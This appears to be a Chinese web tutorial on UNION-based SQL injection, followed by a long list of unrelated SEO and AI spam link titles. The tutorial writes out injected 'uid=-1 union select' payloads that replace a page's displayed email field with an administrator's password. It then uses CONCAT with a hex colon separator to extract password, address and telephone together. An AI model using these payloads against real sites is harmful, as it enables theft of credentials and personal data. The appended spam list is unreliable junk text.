SQL注入语句有时候会使用替换查询技术,就是让原有的查询语句查不到结果出错,而让自己构造的查询语句执行,并把执行结果代替原有查询语句查询结果显示出来。

例如:原本查询语句是
复制代码 代码如下:
select username,email,content from test_table where user_id=uid;
其中uid,是用户输入的。正常显示结果会出现用户名,用户邮箱,用户留言内容。但是如果uid过滤不严,我们可以构造如下SQL语句来获得任意数据表信息。
复制代码 代码如下:
uid=-1 union select username ,password,content from test_talbe where user_id=管理员id;
实际执行就是
复制代码 代码如下:
select username,email,content from test_table where user_id=-1 union select username ,password,content from test_talbe where user_id=管理员id;
其中显示正常用户emai的地方,变成了显示管理员的密码了。
但是,往往事情并不是这么简单,首先要找到漏洞,其次构造这种语句时候要考虑各个字段的类型,让int或samllint类型的字段显示varchar显然不合适。最后就是本文要说的。
如果出现问题的SQL语句只有一个或两个字段怎么办,我们想知道很多东西,一两个字段太少了,远远不能满足我们的需要。那么我们可以使用concat函数。
concat函数本来是这样用的SELECT CONCAT('My', 'S', 'QL');执行结果是'MySQL'。也就是连接作用的。我们利用它来为我们服务,
复制代码 代码如下:
uid=-1 union select username ,concat(password,sex,address,telephone),content from test_talbe where user_id=管理员id;
这个语句实际查询了六个字段,但是显示的时候,把password,sex,address,telephone等字段合在一起,显示在原本应该显示email的地方。
更好的方法:中间用分隔符分开:
复制代码 代码如下:
uid=-1 union select username ,concat(password,0×3a,sex,0×3a,address,0×3a,telephone) ,content from test_talbe where user_id=管理员id;
其中0×3a是“:”的十六进 制形式。
相关推荐:
AI搜索写文章:一丝丝智慧背后的无限可能,电脑免费ai写作神器
ChatGPT+维护页面:您的智能助手之旅,安全、高效、无忧,奥特曼画图ai
人工润色:让文字更具魅力的秘密武器,快排seo软件哪个最好
ChatGPT不能访问,我的学术水平直线下降,泰州大数据ai艾灸价格
seo需要什么人员,seo需要什么技能 ,画大学ai
seo软文用什么论坛,seo软文是什么意思 ,爱字幕的AI变脸不见了
SEO文案:如何通过巧妙布局提升网站排名,吸引更多流量,娄底网站建设工作文案
为什么做抖音seo,为什么做抖音推广 ,描边ai虚线
SEO优化与SEM广告:提升品牌曝光与流量的双重利器,ai接回头
chatai写作免费一键生成,轻松解决写作难题!,陈逗逗ai换脸在线看
SEO努力:提升网站排名的关键策略,网站建设微企动力
seo链接有什么用,seo外链是什么意思 ,one ai写作
《命运交错的轨迹:小说背后的无尽魅力》,seo优化huifachina
pbootcms前端翻译插件-轻松实现网站多语言支持,拓展全球市场,st ai绘画
SEO但是,这些常见误区你真的知道吗?,凤岗网站建设开发
怎么用AI写出高质量科普文章?揭秘新时代创作利器!
怎样利用AI写文章,轻松提升写作效率
seo网站自学看什么书,seo技术适合自学吗 ,斑马ai阅读
SEO基础知识解析:如何提升网站排名,助力企业成长,毕节企业建设网站
SEO联系:如何通过SEO优化提升您的网络营销效果,企业营销推广获客
优化*:打造更加高效、创新的娱乐体验,石排网站建设制作多少钱
SEO词的魔力:如何通过关键词优化打破流量瓶颈,免费网站建设高端
seo追词是什么,seo词条 ,52580609AI
AI人工智能:开发与应用的必备软件推荐
什么是seo概念,什么是seo,sem ,ai音标谐音
seo点击工具,seo排名点击软件推荐 ,ai狂躁
SEO应该如何提升网站流量与排名?揭秘成功的SEO策略,肺炎疫苗推广营销
二创AI:打破创意壁垒,引领未来内容创作新潮流,背影教案网站建设游戏
WPJam:打破网站管理的壁垒,打造极致用户体验,广东谷歌seo工具
SEO项目:如何通过精确优化提升企业网站排名与转化率,武汉做网站优化的公司
未来写作新方式原创AI文章的无限可能
seo读什么书,seo是哪个专业的 ,亚洲9ai吧
ChatGPT崩一次多久修复?揭秘背后的技术与保障,ai1818818
SEO有意:如何通过优化策略提升网站排名与流量,天津政府智慧网站建设
SEO包含的秘密:让你的网站轻松排上首页,新媒体营销推广方案目录
为什么网站要做seo,网站做seo的目的是什么 ,ai初选
ChatGPT198元永久会员,开启智慧之门,体验AI的极致服务!,老孙教ai
SEO关键词推广软件官网-助力企业实现高效精准的网络营销,圈圈ai
Chat免费,让沟通无界限,尽享智能对话时代,ai没办法置顶
SEO深度解析:如何通过深度优化提升网站排名,带来流量和转化,咸宁网站建设大概费用
在线AI文章生成:内容创作新革命
什么是秀米?全方位了解这款微信公众号排版神器,宁波全网营销型网站建设
OpenAI银行卡扣款的公司是哪家?揭秘背后的支付流程与安全保障,AI素描相片
seo需要什么人才,seo需要做什么工作 ,探索ai照片
GPT优化:让你的工作与生活更高效、更智能,Ai__79
智能AI写作生成:如何借助人工智能提升创作效率与质量
seo网站排名优化哪家好,seo网站优化平台 ,ai斗蟋
SOE优化:让你的网站轻松登顶,流量激增的秘密武器,广西网站建设存在问题
AI助手Stut:智能时代的创新引擎,开启未来工作新篇章,ai对ai的格斗游戏
ChatGPT对于大数据发展的帮助:赋能行业变革,推动智能化未来,ai写作真的好吗